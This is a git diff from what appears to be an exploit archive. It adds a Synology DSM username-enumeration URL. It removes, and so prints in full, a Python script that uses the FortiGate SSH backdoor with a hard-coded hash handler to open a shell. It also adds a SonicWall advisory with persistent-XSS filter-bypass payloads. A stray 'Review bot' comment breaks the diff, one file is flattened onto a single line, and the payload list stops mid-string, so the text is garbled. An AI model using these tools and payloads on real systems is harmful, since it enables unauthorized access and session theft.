diff --git a/exploits/cgi/webapps/43455.txt b/exploits/cgi/webapps/43455.txt
new file mode 100644
index 000000000..f5a88af05
--- /dev/null
+++ b/exploits/cgi/webapps/43455.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
+# Date: 01/05/2018
+# Exploit Author: Steve Kaun
+# Vendor Homepage: https://www.synology.com
+# Version: Before 6.1.3-15152
+# CVE : CVE-2017-9554
+
+Previously this was identified by the developer and the disclosure states "via unspecified vectors" it is possible to enumerate usernames via forget_passwd.cgi
+
+Haven't identified any other disclosures that actually identified the attack vector, figure it would be helpful to another.
+
+
+"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors."
+
+Well then... Here you go, cracked the code and figured it out.
+
+https://IP_Address:5001/webman/forget_passwd.cgi?user=XXX
+
+Where XXX should be your injection point for username lists.
+
+Several usernames I've found are admin, administrator, root, nobody, ftp, and more. I'm unsure of whether Synology is pulling these entries from it's passwd file or not, but there you go.
\ No newline at end of file
diff --git a/exploits/hardware/remote/39224.py b/exploits/hardware/remote/39224.py
deleted file mode 100755
index e56d9d0d0..000000000
--- a/exploits/hardware/remote/39224.py
+++ /dev/null
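Review bot: The file implies its fix only through `# Version: Before 6.1.3-15152` and gives no remediation or detection guidance, which is what an operator reading this entry needs most; a header line such as `# Fix: upgrade DSM to 6.1.3-15152 or later; until then do not expose /webman/ to untrusted networks and alert on bursts of forget_passwd.cgi requests with varying user values` would close that gap. Calling the `user` parameter an "injection point" is inaccurate — nothing is injected, the endpoint acts as an account-existence oracle, so "enumeration oracle" or "probe parameter" is the right term. The closing guess that the names come from the passwd file is unsupported by anything shown and should be marked as speculation or dropped. `# Date: 01/05/2018` is ambiguous between January 5 and May 1; an ISO date (`2018-01-05` or `2018-05-01`, whichever is meant) would remove that.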
@@ -1,77 +0,0 @@ -#!/usr/bin/env python - -# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 -# Usage: ./fgt_ssh_backdoor.py - -import socket -import select -import sys -import paramiko -from paramiko.py3compat import u -import base64 -import hashlib -import termios -import tty - -def custom_handler(title, instructions, prompt_list): - n = prompt_list[0][0] - m = hashlib.sha1() - m.update('\x00' * 12) - m.update(n + 'FGTAbc11*xy+Qqz27') - m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70') - h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest()) - return [h] - - -def main(): - if len(sys.argv) < 2: - print 'Usage: ' + sys.argv[0] + ' ' - exit(-1) - - client = paramiko.SSHClient() - client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - - try: - client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False) - except paramiko.ssh_exception.SSHException: - pass - - trans = client.get_transport() - try: - trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) - except paramiko.ssh_exception.AuthenticationException: - pass - - trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler) - chan = client.invoke_shell() - - oldtty = termios.tcgetattr(sys.stdin) - try: - tty.setraw(sys.stdin.fileno()) - tty.setcbreak(sys.stdin.fileno()) - chan.settimeout(0.0) - - while True: - r, w, e = select.select([chan, sys.stdin], [], []) - if chan in r: - try: - x = u(chan.recv(1024)) - if len(x) == 0: - sys.stdout.write('\r\n*** EOF\r\n') - break - sys.stdout.write(x) - sys.stdout.flush() - except socket.timeout: - pass - if sys.stdin in r: - x = sys.stdin.read(1) - if len(x) == 0: - break - chan.send(x) - - finally: - termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty) - - -if __name__ == '__main__': - main() \ No newline at end of file 
diff --git a/exploits/hardware/webapps/43459.txt b/exploits/hardware/webapps/43459.txt
new file mode 100644
index 000000000..409a9f1ea
--- /dev/null
+++ b/exploits/hardware/webapps/43459.txt
@@ -0,0 +1,441 @@
+Document Title:
+===============
+SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1725
+
+
+Release Date:
+=============
+2018-01-06
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1725
+
+
+Common Vulnerability Scoring System:
+====================================
+4.5
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Achieve a deeper level of security with the SonicWALL Network Security Appliance (NSA) Series of next-generation firewalls. NSA Series appliances
+integrate automated and dynamic security capabilities into a single platform, combining the patented1, SonicWALL Reassembly Free Deep Packet
+Inspection (RFDPI) firewall engine with a powerful, massively scalable, multi-core architecture. Now you can block even the most sophisticated
+threats with an intrusion prevention system (IPS) featuring advanced anti-evasion capabilities, SSL decryption and inspection, and network-based
+malware protection that leverages the power of the cloud.
+
+(Copy of the Homepage: http://www.sonicwall.com/products/sonicwall-nsa/ )
+
+
+The proven SonicOS architecture is at the core of every Dell SonicWALL firewall from the SuperMassive™ E10800 to the TZ 100. SonicOS uses deep packet
+inspection technology in combination with multi-core specialized security microprocessors to deliver application intelligence, control, and real-time
+visualization, intrusion prevention, high-speed virtual private networking (VPN) technology and other robust security features.
+
+(Copy of the Homepage: http://www.sonicwall.com/network-security-os-platform/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research Team discovered multiple persistent validation vulnerabilities and a filter bypass issue in
+the official DELL SonicWall SonicOS NSA Series web-application firewall (utm) appliances.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2018-01-06: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+DELL
+Product: SonicWall UTM Firewall (NSA;MX,CLI;TZ) Series 2016 Q4
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities and a filter bypass issue has been discovered in the official SonicWall SoniOS NSA UTM Web-Firewall Series.
+The issue allows remote attackers and privileged user accounts to inject own malicious script codes with persistent attack vector to the affected modules to
+compromise the web-application or user session data.
+
+The peristent exploitable validation vulnerabilities are located in the `Host Name / IP Address`, `Client Name/IP Address` and `Proxy Forward To` input fields of
+the `Users - Settings - Configure SSO` web appliance module. Remote attackers and low privileged application user accounts are able to inject own malicious script
+codes to the vulnerable input fields to compromise the `Users - Settings - Configure SSO` settings module item listing. At the end an attacker is able to save the
+information as executable content within the backend. After that the malicious context is saved to the SSO configuration module which executes the context.
+The input fields are not parsed, the context does not encode the input with a secure mechanism.
The injection points are the marked input fields with the request
+method of the vulnerable modules. The execution points are located in the item listing of the separate sections.
+
+A filter restriction is implemented and is trying to secure the validation. The filter mechanism parses iframes with src source and other script code tags. In case
+of a mouseover onload link to a source or an img src onload with cookie alert the tags can bypass the filter validation procedure somehow and an execution of the
+context occurs.
+
+The security risk of the peristent web vulnerabilities and filter bypass issue are estimated as medium with a cvss (common vulnerability scoring system) count of 4.5.
+Exploitation of the persistent web vulnerabilities and filter bypass issue requires a low privileged web application user account and low or medium user interaction.
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicious script
+codes or persistent web module context manipulation.
+
+Affected Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Users - Settings - Configure SSO - SSO Agents
+[+] Users - Settings - Configure SSO - Terminal Services Agent Settings
+[+] Users - Settings - Configure SSO - RADIUS Accounting Single-Sign-On
+
+Vulnerable Input(s):
+[+] Host Name / IP Address
+[+] Client Name/IP Address
+[+] Proxy Forward To
+
+Vulnerable Parameter(s):
+[+] ldapServerBindName
+[+] usrTreesSel
+[+] ldapUsrsTree_1
+[+] svcObjId
+
+
+Affected Serie(s):
+[+] SonicWALL NSA 6600
+[+] SonicWALL NSA 5600
+[+] SonicWALL NSA 4600
+[+] SonicWALL NSA 3600
+[+] SonicWALL NSA 2600
+[+] SonicWALL NSA 250M
+
+Affected System(s):
+[+] SonicOS (Standard or Enhanced)
+
+
+Proof of Concept (PoC):
+=======================
+The web vulnerabilities can be exploited by remote attackers with low privileged or restricted appliance application user account with low or
+medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the appliance web-application firewall of sonicwall and login as restricted user or lower privileged user account +2. Surf to the Users module +3. Click to Settings and open the "SSO Configure" button +4. Open one of the vulnerable modules +Note: Users > Settings > Configure SSO > SSO Agents; > Terminal Services Agent Settings or > RADIUS Accounting Single-Sign-On +5. Inject a script code payload to the Host Name/IP Address(es), Client Name/IP Address & Proxy Forward To input fields +Note: Regular frames are filtered but img or iframes with alert onload or onmouseover tag do bypass the filter validation +6. Save the entry and the payload directly executes in the utm firewall web user interface +7. Successful reproduce of the application-side input validation vulnerability and filter bypass issue! + + +PoC Payload(s): +">XSS ONMOUSEOVER TEST +"> +"><"%20%20>"